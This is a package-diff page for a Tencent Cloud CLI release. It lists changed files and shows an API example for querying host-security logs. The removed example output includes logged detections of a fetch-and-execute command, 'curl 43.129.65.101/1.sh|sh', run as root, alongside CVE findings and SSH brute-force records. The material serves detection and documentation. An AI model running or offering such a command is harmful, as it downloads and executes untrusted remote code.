tccli 3.0.1241.1__py2.py3-none-any.whl → 3.0.1243.1__py2.py3-none-any.whl

Sign up to get free protection for your applications and to get access to all the features.
Files changed (86) hide show
  1. tccli/__init__.py +1 -1
  2. tccli/services/apm/v20210622/api.json +216 -216
  3. tccli/services/apm/v20210622/examples.json +5 -5
  4. tccli/services/bh/v20230418/api.json +9 -0
  5. tccli/services/bh/v20230418/examples.json +2 -2
  6. tccli/services/cfs/v20190719/api.json +20 -20
  7. tccli/services/cfs/v20190719/examples.json +7 -7
  8. tccli/services/ckafka/v20190819/api.json +38 -0
  9. tccli/services/clb/v20180317/api.json +107 -82
  10. tccli/services/clb/v20180317/examples.json +14 -14
  11. tccli/services/cls/cls_client.py +220 -8
  12. tccli/services/cls/v20201016/api.json +417 -39
  13. tccli/services/cls/v20201016/examples.json +89 -45
  14. tccli/services/cwp/v20180228/api.json +3 -3
  15. tccli/services/cwp/v20180228/examples.json +2 -2
  16. tccli/services/cynosdb/v20190107/api.json +18 -18
  17. tccli/services/dbbrain/v20210527/api.json +1 -1
  18. tccli/services/dnspod/v20210323/api.json +173 -119
  19. tccli/services/dnspod/v20210323/examples.json +18 -18
  20. tccli/services/ecm/v20190719/api.json +11 -11
  21. tccli/services/ecm/v20190719/examples.json +1 -1
  22. tccli/services/emr/v20190103/api.json +896 -841
  23. tccli/services/ess/v20201111/api.json +18 -9
  24. tccli/services/ess/v20201111/examples.json +6 -0
  25. tccli/services/essbasic/v20210526/api.json +80 -2
  26. tccli/services/gaap/v20180529/api.json +16 -18
  27. tccli/services/goosefs/v20220519/api.json +17 -17
  28. tccli/services/goosefs/v20220519/examples.json +4 -4
  29. tccli/services/gwlb/v20240906/api.json +14 -14
  30. tccli/services/hunyuan/v20230901/api.json +1 -1
  31. tccli/services/iotexplorer/v20190423/api.json +1 -1
  32. tccli/services/iotvideoindustry/v20201201/api.json +244 -192
  33. tccli/services/iotvideoindustry/v20201201/examples.json +32 -32
  34. tccli/services/live/v20180801/api.json +1 -1
  35. tccli/services/mna/v20210119/api.json +110 -109
  36. tccli/services/mna/v20210119/examples.json +63 -63
  37. tccli/services/mps/v20190612/api.json +9 -0
  38. tccli/services/ocr/ocr_client.py +110 -4
  39. tccli/services/ocr/v20181119/api.json +370 -7
  40. tccli/services/ocr/v20181119/examples.json +20 -4
  41. tccli/services/pts/v20210728/api.json +37 -34
  42. tccli/services/pts/v20210728/examples.json +13 -13
  43. tccli/services/sqlserver/v20180328/api.json +68 -6
  44. tccli/services/ssl/v20191205/api.json +52 -50
  45. tccli/services/ssl/v20191205/examples.json +7 -7
  46. tccli/services/tbaas/v20180416/api.json +9 -6
  47. tccli/services/tbaas/v20180416/examples.json +2 -2
  48. tccli/services/tcb/v20180608/api.json +270 -221
  49. tccli/services/tcb/v20180608/examples.json +22 -22
  50. tccli/services/tcm/v20210413/api.json +2 -2
  51. tccli/services/tcm/v20210413/examples.json +2 -2
  52. tccli/services/tcr/v20190924/api.json +8 -8
  53. tccli/services/tcr/v20190924/examples.json +4 -4
  54. tccli/services/tdmq/tdmq_client.py +167 -8
  55. tccli/services/tdmq/v20200217/api.json +307 -0
  56. tccli/services/tdmq/v20200217/examples.json +24 -0
  57. tccli/services/tem/v20210701/api.json +1 -1
  58. tccli/services/tem/v20210701/examples.json +2 -2
  59. tccli/services/teo/v20220901/api.json +2 -2
  60. tccli/services/teo/v20220901/examples.json +3 -3
  61. tccli/services/thpc/v20211109/api.json +74 -100
  62. tccli/services/thpc/v20211109/examples.json +2 -2
  63. tccli/services/thpc/v20220401/api.json +196 -223
  64. tccli/services/thpc/v20220401/examples.json +1 -1
  65. tccli/services/thpc/v20230321/api.json +150 -153
  66. tccli/services/thpc/v20230321/examples.json +3 -3
  67. tccli/services/tke/v20180525/api.json +1 -1
  68. tccli/services/tke/v20180525/examples.json +2 -2
  69. tccli/services/tke/v20220501/api.json +161 -112
  70. tccli/services/tke/v20220501/examples.json +15 -21
  71. tccli/services/trocket/trocket_client.py +53 -0
  72. tccli/services/trocket/v20230308/api.json +219 -0
  73. tccli/services/trocket/v20230308/examples.json +8 -0
  74. tccli/services/trtc/v20190722/api.json +31 -20
  75. tccli/services/trtc/v20190722/examples.json +11 -11
  76. tccli/services/tse/v20201207/api.json +141 -113
  77. tccli/services/tse/v20201207/examples.json +5 -5
  78. tccli/services/tsf/v20180326/examples.json +1 -1
  79. tccli/services/vpc/v20170312/api.json +320 -270
  80. tccli/services/vpc/v20170312/examples.json +40 -40
  81. tccli/services/waf/v20180125/api.json +2 -2
  82. {tccli-3.0.1241.1.dist-info → tccli-3.0.1243.1.dist-info}/METADATA +2 -2
  83. {tccli-3.0.1241.1.dist-info → tccli-3.0.1243.1.dist-info}/RECORD +86 -86
  84. {tccli-3.0.1241.1.dist-info → tccli-3.0.1243.1.dist-info}/WHEEL +0 -0
  85. {tccli-3.0.1241.1.dist-info → tccli-3.0.1243.1.dist-info}/entry_points.txt +0 -0
  86. {tccli-3.0.1241.1.dist-info → tccli-3.0.1243.1.dist-info}/license_files/LICENSE +0 -0
@@ -4035,8 +4035,8 @@
4035
4035
  "SearchLog": [
4036
4036
  {
4037
4037
  "document": "",
4038
- "input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: SearchLog\n<公共请求参数>\n\n{\n \"Sort\": \"desc\",\n \"Count\": \"20\",\n \"QueryString\": \"status: \\\"异常登录\\\" AND public_ip_addresses: (1* OR 2* OR 3* OR 4* OR 5* OR 6* OR 7* OR 8* OR 9*) AND NOT hostip: (10.128.200.* OR 10.129.24.212) AND NOT src_ip: (10.128.128.7 OR 192.144.182.173) AND NOT username: ****\",\n \"StartTime\": \"1656641065449\",\n \"EndTime\": \"1656641965449\"\n}",
4039
- "output": "{\n \"Response\": {\n \"Analysis\": false,\n \"Context\": \"content\",\n \"Count\": 17,\n \"Data\": [\n {\n \"Content\": \"{\\\"create_time\\\":\\\"2022-07-01 10:00:27 +0800 CST\\\",\\\"hostip\\\":\\\"10.0.0.6\\\",\\\"level\\\":\\\"中危\\\",\\\"modify_time\\\":\\\"2022-07-01 10:17:05 +0800 CST\\\",\\\"remark\\\":\\\"\\\",\\\"uuid\\\":\\\"13bb1e16-9a7a-434d-9686-4328f72c97d7\\\",\\\"is_emergency\\\":\\\"False\\\",\\\"reference\\\":\\\"https://www.phpmyadmin.net/security/PMASA-2016-20/\\\",\\\"path\\\":\\\"/var/www/html/phpmyadmin\\\",\\\"fix\\\":\\\"1、建议升级到官方最新版本,官网地址:https://www.phpmyadmin.net\\\",\\\"cve_id\\\":\\\"CVE-2016-5704\\\",\\\"cls_event_type\\\":\\\"Web-CMS_vul\\\",\\\"appid\\\":\\\"1256299843\\\",\\\"name\\\":\\\"phpMyAdmin 4.6.x 表结构页面存在XSS漏洞\\\",\\\"id\\\":\\\"771\\\",\\\"vul_category\\\":\\\"Web-CMS漏洞\\\",\\\"descript\\\":\\\"漏洞文件路径: /var/www/html/phpmyadmin/templates/table/structure/display_table_stats.phtml\\\",\\\"event_status\\\":\\\"modify\\\",\\\"status\\\":\\\"待处理\\\"}\",\n \"FileName\": \"file***\",\n \"Source\": \"30.46.128.22\",\n \"TimeStamp\": 1656641946000\n },\n {\n \"Content\": \"{\\\"create_time\\\":\\\"2022-07-01 10:00:27 +0800 CST\\\",\\\"hostip\\\":\\\"10.0.0.6\\\",\\\"level\\\":\\\"高危\\\",\\\"modify_time\\\":\\\"2022-07-01 10:17:05 +0800 CST\\\",\\\"remark\\\":\\\"\\\",\\\"uuid\\\":\\\"13bb1e16-9a7a-434d-9686-4328f72c97d7\\\",\\\"is_emergency\\\":\\\"False\\\",\\\"reference\\\":\\\"https://httpd.apache.org/security/vulnerabilities_24.html\\\",\\\"path\\\":\\\"\\\",\\\"fix\\\":\\\"升级至2.4.6-90及以上版本或 2.4.39及以上版本\\\",\\\"cve_id\\\":\\\"CVE-2019-0217\\\",\\\"cls_event_type\\\":\\\"application_vul\\\",\\\"appid\\\":\\\"1256299843\\\",\\\"name\\\":\\\"Apache HTTP Server mod_auth_digest 条件竞争漏洞\\\",\\\"id\\\":\\\"767\\\",\\\"vul_category\\\":\\\"应用漏洞\\\",\\\"descript\\\":\\\"Apache HTTP Server 启用了 mod_auth_digest 模块,且Apache HTTP Server 版本为:2.4.37-47.module_el8.6.0+1111+ce6f4ceb.1。\\\",\\\"event_status\\\":\\\"modify\\\",\\\"status\\\":\\\"待处理\\\"}\",\n \"FileName\": \"file***\",\n \"Source\": \"30.46.128.22\",\n \"TimeStamp\": 1656641946000\n },\n {\n \"Content\": \"{\\\"create_time\\\":\\\"2022-07-01 10:00:27 +0800 CST\\\",\\\"hostip\\\":\\\"10.0.0.6\\\",\\\"level\\\":\\\"中危\\\",\\\"modify_time\\\":\\\"2022-07-01 10:17:05 +0800 CST\\\",\\\"remark\\\":\\\"\\\",\\\"uuid\\\":\\\"13bb1e16-9a7a-434d-9686-4328f72c97d7\\\",\\\"is_emergency\\\":\\\"True\\\",\\\"reference\\\":\\\"https://www.phpmyadmin.net/security/PMASA-2016-19/\\\",\\\"path\\\":\\\"/var/www/html/phpmyadmin\\\",\\\"fix\\\":\\\"1、建议升级到官方最新版本,官网地址:https://www.phpmyadmin.net\\\",\\\"cve_id\\\":\\\"CVE-2016-5703\\\",\\\"cls_event_type\\\":\\\"emergency_vul\\\",\\\"appid\\\":\\\"1256299843\\\",\\\"name\\\":\\\"phpMyAdmin central_columns.lib.php SQL注入漏洞\\\",\\\"id\\\":\\\"772\\\",\\\"vul_category\\\":\\\"Web-CMS漏洞\\\",\\\"descript\\\":\\\"漏洞文件路径: /var/www/html/phpmyadmin/libraries/central_columns.lib.php\\\",\\\"event_status\\\":\\\"modify\\\",\\\"status\\\":\\\"待处理\\\"}\",\n \"FileName\": \"file***\",\n \"Source\": \"30.46.128.22\",\n \"TimeStamp\": 1656641946000\n },\n {\n \"Content\": \"{\\\"create_time\\\":\\\"2022-07-01 10:00:27 +0800 CST\\\",\\\"hostip\\\":\\\"10.0.0.6\\\",\\\"level\\\":\\\"高危\\\",\\\"modify_time\\\":\\\"2022-07-01 10:17:05 +0800 CST\\\",\\\"remark\\\":\\\"\\\",\\\"uuid\\\":\\\"13bb1e16-9a7a-434d-9686-4328f72c97d7\\\",\\\"is_emergency\\\":\\\"False\\\",\\\"reference\\\":\\\"https://www.seebug.org/vuldb/ssvid-92512\\\",\\\"path\\\":\\\"/var/www/html/phpmyadmin\\\",\\\"fix\\\":\\\"1、升级到最新版本,官网地址:https://www.phpmyadmin.net\\\",\\\"cve_id\\\":\\\"CVE-2016-6633\\\",\\\"cls_event_type\\\":\\\"Web-CMS_vul\\\",\\\"appid\\\":\\\"1256299843\\\",\\\"name\\\":\\\"phpMyAdmin dbase extension 远程代码执行漏洞\\\",\\\"id\\\":\\\"764\\\",\\\"vul_category\\\":\\\"Web-CMS漏洞\\\",\\\"descript\\\":\\\"漏洞文件路径: /var/www/html/phpmyadmin/libraries/zip_extension.lib.php\\\",\\\"event_status\\\":\\\"modify\\\",\\\"status\\\":\\\"待处理\\\"}\",\n \"FileName\": \"file***\",\n \"Source\": \"30.46.128.22\",\n \"TimeStamp\": 1656641946000\n },\n {\n \"Content\": \"{\\\"create_time\\\":\\\"2022-07-01 10:00:27 +0800 CST\\\",\\\"hostip\\\":\\\"10.0.0.6\\\",\\\"level\\\":\\\"中危\\\",\\\"modify_time\\\":\\\"2022-07-01 10:17:05 +0800 CST\\\",\\\"remark\\\":\\\"\\\",\\\"uuid\\\":\\\"13bb1e16-9a7a-434d-9686-4328f72c97d7\\\",\\\"is_emergency\\\":\\\"False\\\",\\\"reference\\\":\\\"https://httpd.apache.org/security/vulnerabilities_24.html#CVE-2020-9490\\\",\\\"path\\\":\\\"\\\",\\\"fix\\\":\\\"升级 Apache HTTP Server到 2.4.46 版本\\\",\\\"cve_id\\\":\\\"CVE-2020-9490\\\",\\\"cls_event_type\\\":\\\"application_vul\\\",\\\"appid\\\":\\\"1256299843\\\",\\\"name\\\":\\\"Apache HTTP Server http2_module 拒绝服务漏洞\\\",\\\"id\\\":\\\"769\\\",\\\"vul_category\\\":\\\"应用漏洞\\\",\\\"descript\\\":\\\"Apache HTTP Server 启用了 mod_http2 模块,且Apache HTTP Server版本为:2.4.37-47.module_el8.6.0+1111+ce6f4ceb.1。\\\",\\\"event_status\\\":\\\"modify\\\",\\\"status\\\":\\\"待处理\\\"}\",\n \"FileName\": \"file***\",\n \"Source\": \"30.46.128.22\",\n \"TimeStamp\": 1656641946000\n },\n {\n \"Content\": \"{\\\"create_time\\\":\\\"2022-07-01 10:00:27 +0800 CST\\\",\\\"hostip\\\":\\\"10.0.0.6\\\",\\\"level\\\":\\\"高危\\\",\\\"modify_time\\\":\\\"2022-07-01 10:17:05 +0800 CST\\\",\\\"remark\\\":\\\"\\\",\\\"uuid\\\":\\\"13bb1e16-9a7a-434d-9686-4328f72c97d7\\\",\\\"is_emergency\\\":\\\"True\\\",\\\"reference\\\":\\\"https://www.seebug.org/vuldb/ssvid-92209\\\",\\\"path\\\":\\\"/var/www/html/phpmyadmin\\\",\\\"fix\\\":\\\"1、建议升级至官方最新版本并且避免使用弱密码;\\\",\\\"cve_id\\\":\\\"CVE-2016-5734\\\",\\\"cls_event_type\\\":\\\"emergency_vul\\\",\\\"appid\\\":\\\"1256299843\\\",\\\"name\\\":\\\"phpMyAdmin授权用户远程命令执行漏洞\\\",\\\"id\\\":\\\"768\\\",\\\"vul_category\\\":\\\"Web-CMS漏洞\\\",\\\"descript\\\":\\\"漏洞文件路径: /var/www/html/phpmyadmin/libraries/controllers/table/TableSearchController.php\\\",\\\"event_status\\\":\\\"modify\\\",\\\"status\\\":\\\"待处理\\\"}\",\n \"FileName\": \"file***\",\n \"Source\": \"30.46.128.22\",\n \"TimeStamp\": 1656641946000\n },\n {\n \"Content\": \"{\\\"create_time\\\":\\\"2022-07-01 10:00:27 +0800 CST\\\",\\\"hostip\\\":\\\"10.0.0.6\\\",\\\"level\\\":\\\"高危\\\",\\\"modify_time\\\":\\\"2022-07-01 10:17:05 +0800 CST\\\",\\\"remark\\\":\\\"\\\",\\\"uuid\\\":\\\"13bb1e16-9a7a-434d-9686-4328f72c97d7\\\",\\\"is_emergency\\\":\\\"False\\\",\\\"reference\\\":\\\"https://www.phpmyadmin.net/security/PMASA-2016-40/\\\",\\\"path\\\":\\\"/var/www/html/phpmyadmin\\\",\\\"fix\\\":\\\"1、建议升级到官方最新版本,官网地址:https://www.phpmyadmin.net\\\",\\\"cve_id\\\":\\\"CVE-2016-6617\\\",\\\"cls_event_type\\\":\\\"Web-CMS_vul\\\",\\\"appid\\\":\\\"1256299843\\\",\\\"name\\\":\\\"phpMyAdmin 4.6.x 导出功能SQL注入漏洞\\\",\\\"id\\\":\\\"765\\\",\\\"vul_category\\\":\\\"Web-CMS漏洞\\\",\\\"descript\\\":\\\"漏洞文件路径: /var/www/html/phpmyadmin/libraries/display_export.lib.php\\\",\\\"event_status\\\":\\\"modify\\\",\\\"status\\\":\\\"待处理\\\"}\",\n \"FileName\": \"file***\",\n \"Source\": \"30.46.128.22\",\n \"TimeStamp\": 1656641946000\n },\n {\n \"Content\": \"{\\\"create_time\\\":\\\"2022-07-01 10:00:27 +0800 CST\\\",\\\"hostip\\\":\\\"10.0.0.6\\\",\\\"level\\\":\\\"高危\\\",\\\"modify_time\\\":\\\"2022-07-01 10:17:05 +0800 CST\\\",\\\"remark\\\":\\\"\\\",\\\"uuid\\\":\\\"13bb1e16-9a7a-434d-9686-4328f72c97d7\\\",\\\"is_emergency\\\":\\\"False\\\",\\\"reference\\\":\\\"https://www.phpmyadmin.net/security/PMASA-2016-25/\\\",\\\"path\\\":\\\"/var/www/html/phpmyadmin\\\",\\\"fix\\\":\\\"1、建议升级到官方最新版本,官网地址:https://www.phpmyadmin.net\\\",\\\"cve_id\\\":\\\"CVE-2016-5732\\\",\\\"cls_event_type\\\":\\\"Web-CMS_vul\\\",\\\"appid\\\":\\\"1256299843\\\",\\\"name\\\":\\\"phpMyAdmin 4.6.x XSS漏洞\\\",\\\"id\\\":\\\"770\\\",\\\"vul_category\\\":\\\"Web-CMS漏洞\\\",\\\"descript\\\":\\\"漏洞文件路径: /var/www/html/phpmyadmin/templates/table/structure/display_partitions.phtml\\\",\\\"event_status\\\":\\\"modify\\\",\\\"status\\\":\\\"待处理\\\"}\",\n \"FileName\": \"file***\",\n \"Source\": \"30.46.128.22\",\n \"TimeStamp\": 1656641946000\n },\n {\n \"Content\": \"{\\\"create_time\\\":\\\"2022-07-01 10:00:27 +0800 CST\\\",\\\"hostip\\\":\\\"10.0.0.6\\\",\\\"level\\\":\\\"中危\\\",\\\"modify_time\\\":\\\"2022-07-01 10:17:05 +0800 CST\\\",\\\"remark\\\":\\\"\\\",\\\"uuid\\\":\\\"13bb1e16-9a7a-434d-9686-4328f72c97d7\\\",\\\"is_emergency\\\":\\\"False\\\",\\\"reference\\\":\\\"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11984\\\",\\\"path\\\":\\\"\\\",\\\"fix\\\":\\\"升级至2.4.44及以上版本\\\",\\\"cve_id\\\":\\\"CVE-2020-11984\\\",\\\"cls_event_type\\\":\\\"application_vul\\\",\\\"appid\\\":\\\"1256299843\\\",\\\"name\\\":\\\"Apache HTTP Server mod_proxy_uwsgi 缓冲区溢出漏洞\\\",\\\"id\\\":\\\"766\\\",\\\"vul_category\\\":\\\"应用漏洞\\\",\\\"descript\\\":\\\"Apache HTTP Server 启用了 mod_proxy_uwsgi 模块,且版本为:2.4.37-47.module_el8.6.0+1111+ce6f4ceb.1。\\\",\\\"event_status\\\":\\\"modify\\\",\\\"status\\\":\\\"待处理\\\"}\",\n \"FileName\": \"file***\",\n \"Source\": \"30.46.128.22\",\n \"TimeStamp\": 1656641946000\n },\n {\n \"Content\": \"{\\\"create_time\\\":\\\"2022-06-30 11:01:55 +0800 CST\\\",\\\"hostip\\\":\\\"172.16.48.133\\\",\\\"modify_time\\\":\\\"2022-07-01 10:15:23 +0800 CST\\\",\\\"count\\\":\\\"3380\\\",\\\"uuid\\\":\\\"e1f081aa-7777-4fdf-a2f7-88f3faa3d302\\\",\\\"src_ip\\\":\\\"82.157.124.14\\\",\\\"src_machine_name\\\":\\\"ssh\\\",\\\"event_type\\\":\\\"暴破失败\\\",\\\"appid\\\":\\\"1256299843\\\",\\\"cls_event_type\\\":\\\"bruteattack\\\",\\\"dst_port\\\":\\\"22\\\",\\\"location\\\":\\\"北京-北京市\\\",\\\"banned\\\":\\\"未阻断(非专业版、非旗舰版)\\\",\\\"id\\\":\\\"202226000001705\\\",\\\"event_status\\\":\\\"modify\\\",\\\"status\\\":\\\"待处理\\\",\\\"username\\\":\\\"root\\\"}\",\n \"FileName\": \"file***\",\n \"Source\": \"30.46.128.22\",\n \"TimeStamp\": 1656641844000\n },\n {\n \"Content\": \"{\\\"create_time\\\":\\\"2022-06-30 11:01:55 +0800 CST\\\",\\\"hostip\\\":\\\"172.16.48.133\\\",\\\"modify_time\\\":\\\"2022-07-01 10:15:23 +0800 CST\\\",\\\"count\\\":\\\"3380\\\",\\\"uuid\\\":\\\"e1f081aa-7777-4fdf-a2f7-88f3faa3d302\\\",\\\"src_ip\\\":\\\"82.157.124.14\\\",\\\"src_machine_name\\\":\\\"ssh\\\",\\\"event_type\\\":\\\"暴破失败\\\",\\\"appid\\\":\\\"1256299843\\\",\\\"cls_event_type\\\":\\\"bruteattack\\\",\\\"dst_port\\\":\\\"22\\\",\\\"location\\\":\\\"北京-北京市\\\",\\\"banned\\\":\\\"未阻断(非专业版、非旗舰版)\\\",\\\"id\\\":\\\"202226000001705\\\",\\\"event_status\\\":\\\"modify\\\",\\\"status\\\":\\\"待处理\\\",\\\"username\\\":\\\"root\\\"}\",\n \"FileName\": \"file***\",\n \"Source\": \"30.46.128.22\",\n \"TimeStamp\": 1656641824000\n },\n {\n \"Content\": \"{\\\"create_time\\\":\\\"2022-07-01 10:10:03 +0800 CST\\\",\\\"hostip\\\":\\\"172.16.0.49\\\",\\\"rule_name\\\":\\\"1003.恶意命令-下载&执行未知程序\\\",\\\"modify_time\\\":\\\"0001-01-01 00:00:00 +0000 UTC\\\",\\\"rule_level\\\":\\\"高危\\\",\\\"uuid\\\":\\\"7168bc08-c1b8-11ea-9053-48fd8e5f474c\\\",\\\"platform\\\":\\\"Linux64\\\",\\\"appid\\\":\\\"1256299843\\\",\\\"cls_event_type\\\":\\\"bash\\\",\\\"exec_time\\\":\\\"2022-07-01 10:10:01 +0800 CST\\\",\\\"id\\\":\\\"3141559\\\",\\\"bash_cmd\\\":\\\"/bin/sh -c curl 43.129.65.101/1.sh|sh\\\",\\\"user\\\":\\\"0:0\\\",\\\"event_status\\\":\\\"create\\\",\\\"status\\\":\\\"待处理\\\"}\",\n \"FileName\": \"file***\",\n \"Source\": \"30.46.128.22\",\n \"TimeStamp\": 1656641520000\n },\n {\n \"Content\": \"{\\\"create_time\\\":\\\"2022-07-01 07:44:58 +0800 CST\\\",\\\"hostip\\\":\\\"172.16.48.79\\\",\\\"modify_time\\\":\\\"2022-07-01 10:09:23 +0800 CST\\\",\\\"count\\\":\\\"349\\\",\\\"uuid\\\":\\\"93137e79-ae2e-4677-95ac-23a5024607b1\\\",\\\"src_ip\\\":\\\"110.40.168.164\\\",\\\"src_machine_name\\\":\\\"ssh\\\",\\\"event_type\\\":\\\"暴破失败\\\",\\\"appid\\\":\\\"1256299843\\\",\\\"cls_event_type\\\":\\\"bruteattack\\\",\\\"dst_port\\\":\\\"22\\\",\\\"location\\\":\\\"上海-上海市\\\",\\\"banned\\\":\\\"未阻断(非专业版、非旗舰版)\\\",\\\"id\\\":\\\"202226000001999\\\",\\\"event_status\\\":\\\"modify\\\",\\\"status\\\":\\\"待处理\\\",\\\"username\\\":\\\"root\\\"}\",\n \"FileName\": \"file***\",\n \"Source\": \"30.46.128.22\",\n \"TimeStamp\": 1656641484000\n },\n {\n \"Content\": \"{\\\"create_time\\\":\\\"2022-07-01 07:44:58 +0800 CST\\\",\\\"hostip\\\":\\\"172.16.48.79\\\",\\\"modify_time\\\":\\\"2022-07-01 10:09:23 +0800 CST\\\",\\\"count\\\":\\\"349\\\",\\\"uuid\\\":\\\"93137e79-ae2e-4677-95ac-23a5024607b1\\\",\\\"src_ip\\\":\\\"110.40.168.164\\\",\\\"src_machine_name\\\":\\\"ssh\\\",\\\"event_type\\\":\\\"暴破失败\\\",\\\"appid\\\":\\\"1256299843\\\",\\\"cls_event_type\\\":\\\"bruteattack\\\",\\\"dst_port\\\":\\\"22\\\",\\\"location\\\":\\\"上海-上海市\\\",\\\"banned\\\":\\\"未阻断(非专业版、非旗舰版)\\\",\\\"id\\\":\\\"202226000001999\\\",\\\"event_status\\\":\\\"modify\\\",\\\"status\\\":\\\"待处理\\\",\\\"username\\\":\\\"root\\\"}\",\n \"FileName\": \"file***\",\n \"Source\": \"30.46.128.22\",\n \"TimeStamp\": 1656641464000\n },\n {\n \"Content\": \"{\\\"create_time\\\":\\\"2022-07-01 10:07:04 +0800 CST\\\",\\\"hostip\\\":\\\"172.16.0.49\\\",\\\"rule_name\\\":\\\"1003.恶意命令-下载&执行未知程序\\\",\\\"modify_time\\\":\\\"0001-01-01 00:00:00 +0000 UTC\\\",\\\"rule_level\\\":\\\"高危\\\",\\\"uuid\\\":\\\"7168bc08-c1b8-11ea-9053-48fd8e5f474c\\\",\\\"platform\\\":\\\"Linux64\\\",\\\"appid\\\":\\\"1256299843\\\",\\\"cls_event_type\\\":\\\"bash\\\",\\\"exec_time\\\":\\\"2022-07-01 10:07:01 +0800 CST\\\",\\\"id\\\":\\\"3141558\\\",\\\"bash_cmd\\\":\\\"/bin/sh -c curl 43.129.65.101/1.sh|sh\\\",\\\"user\\\":\\\"0:0\\\",\\\"event_status\\\":\\\"create\\\",\\\"status\\\":\\\"待处理\\\"}\",\n \"FileName\": \"file***\",\n \"Source\": \"30.46.128.22\",\n \"TimeStamp\": 1656641280000\n },\n {\n \"Content\": \"{\\\"create_time\\\":\\\"2022-07-01 10:05:04 +0800 CST\\\",\\\"hostip\\\":\\\"172.16.0.49\\\",\\\"rule_name\\\":\\\"1003.恶意命令-下载&执行未知程序\\\",\\\"modify_time\\\":\\\"0001-01-01 00:00:00 +0000 UTC\\\",\\\"rule_level\\\":\\\"高危\\\",\\\"uuid\\\":\\\"7168bc08-c1b8-11ea-9053-48fd8e5f474c\\\",\\\"platform\\\":\\\"Linux64\\\",\\\"appid\\\":\\\"1256299843\\\",\\\"cls_event_type\\\":\\\"bash\\\",\\\"exec_time\\\":\\\"2022-07-01 10:05:01 +0800 CST\\\",\\\"id\\\":\\\"3141557\\\",\\\"bash_cmd\\\":\\\"/bin/sh -c curl 43.129.65.101/1.sh|sh\\\",\\\"user\\\":\\\"0:0\\\",\\\"event_status\\\":\\\"create\\\",\\\"status\\\":\\\"待处理\\\"}\",\n \"FileName\": \"file***\",\n \"Source\": \"30.46.128.22\",\n \"TimeStamp\": 1656641160000\n },\n {\n \"Content\": \"{\\\"create_time\\\":\\\"2022-07-01 10:04:05 +0800 CST\\\",\\\"hostip\\\":\\\"172.16.0.49\\\",\\\"rule_name\\\":\\\"1003.恶意命令-下载&执行未知程序\\\",\\\"modify_time\\\":\\\"0001-01-01 00:00:00 +0000 UTC\\\",\\\"rule_level\\\":\\\"高危\\\",\\\"uuid\\\":\\\"7168bc08-c1b8-11ea-9053-48fd8e5f474c\\\",\\\"platform\\\":\\\"Linux64\\\",\\\"appid\\\":\\\"1256299843\\\",\\\"cls_event_type\\\":\\\"bash\\\",\\\"exec_time\\\":\\\"2022-07-01 10:04:01 +0800 CST\\\",\\\"id\\\":\\\"3141556\\\",\\\"bash_cmd\\\":\\\"/bin/sh -c curl 43.129.65.101/1.sh|sh\\\",\\\"user\\\":\\\"0:0\\\",\\\"event_status\\\":\\\"create\\\",\\\"status\\\":\\\"待处理\\\"}\",\n \"FileName\": \"file***\",\n \"Source\": \"30.46.128.22\",\n \"TimeStamp\": 1656641160000\n }\n ],\n \"ListOver\": true,\n \"RequestId\": \"e6bb2f6d-10b3-40fd-b3a4-630dbdf477c3\"\n }\n}",
4038
+ "input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: SearchLog\n<公共请求参数>\n\n{\n \"Sort\": \"desc\",\n \"Count\": \"20\",\n \"QueryString\": \"status: \\\"异常登录\\\" AND public_ip_addresses: (1* OR 2*) AND NOT hostip: (10.128.200.* OR 10.129.24.212) AND NOT src_ip: (10.128.128.7 OR 192.144.182.173)\",\n \"StartTime\": \"1656641065449\",\n \"EndTime\": \"1656641965449\"\n}",
4039
+ "output": "{\n \"Response\": {\n \"Analysis\": false,\n \"Context\": \"content\",\n \"Count\": 2,\n \"Data\": [\n {\n \"Content\": \"{\\\"create_time\\\":\\\"2022-07-01 10:00:27 +0800 CST\\\",\\\"hostip\\\":\\\"10.0.0.6\\\",\\\"level\\\":\\\"中危\\\",\\\"modify_time\\\":\\\"2022-07-01 10:17:05 +0800 CST\\\",\\\"remark\\\":\\\"\\\",\\\"uuid\\\":\\\"13bb1e16-9a7a-434d-9686-4328f72c97d7\\\",\\\"is_emergency\\\":\\\"False\\\",\\\"reference\\\":\\\"https://www.phpmyadmin.net/security/PMASA-2016-20/\\\",\\\"path\\\":\\\"/var/www/html/phpmyadmin\\\",\\\"fix\\\":\\\"1、建议升级到官方最新版本,官网地址:https://www.phpmyadmin.net\\\",\\\"cve_id\\\":\\\"CVE-2016-5704\\\",\\\"cls_event_type\\\":\\\"Web-CMS_vul\\\",\\\"appid\\\":\\\"1256299843\\\",\\\"name\\\":\\\"phpMyAdmin 4.6.x 表结构页面存在XSS漏洞\\\",\\\"id\\\":\\\"771\\\",\\\"vul_category\\\":\\\"Web-CMS漏洞\\\",\\\"descript\\\":\\\"漏洞文件路径: /var/www/html/phpmyadmin/templates/table/structure/display_table_stats.phtml\\\",\\\"event_status\\\":\\\"modify\\\",\\\"status\\\":\\\"待处理\\\"}\",\n \"FileName\": \"file***\",\n \"Source\": \"\",\n \"TimeStamp\": 1656641946000\n },\n {\n \"Content\": \"{\\\"create_time\\\":\\\"2022-07-01 10:00:27 +0800 CST\\\",\\\"hostip\\\":\\\"10.0.0.6\\\",\\\"level\\\":\\\"高危\\\",\\\"modify_time\\\":\\\"2022-07-01 10:17:05 +0800 CST\\\",\\\"remark\\\":\\\"\\\",\\\"uuid\\\":\\\"13bb1e16-9a7a-434d-9686-4328f72c97d7\\\",\\\"is_emergency\\\":\\\"False\\\",\\\"reference\\\":\\\"https://httpd.apache.org/security/vulnerabilities_24.html\\\",\\\"path\\\":\\\"\\\",\\\"fix\\\":\\\"升级至2.4.6-90及以上版本或 2.4.39及以上版本\\\",\\\"cve_id\\\":\\\"CVE-2019-0217\\\",\\\"cls_event_type\\\":\\\"application_vul\\\",\\\"appid\\\":\\\"1256299843\\\",\\\"name\\\":\\\"Apache HTTP Server mod_auth_digest 条件竞争漏洞\\\",\\\"id\\\":\\\"767\\\",\\\"vul_category\\\":\\\"应用漏洞\\\",\\\"descript\\\":\\\"Apache HTTP Server 启用了 mod_auth_digest 模块,且Apache HTTP Server 版本为:2.4.37-47.module_el8.6.0+1111+ce6f4ceb.1。\\\",\\\"event_status\\\":\\\"modify\\\",\\\"status\\\":\\\"待处理\\\"}\",\n \"FileName\": \"file***\",\n \"Source\": \"\",\n \"TimeStamp\": 1656641946000\n }\n ],\n \"ListOver\": true,\n \"RequestId\": \"e6bb2f6d-10b3-40fd-b3a4-630dbdf477c3\"\n }\n}",
4040
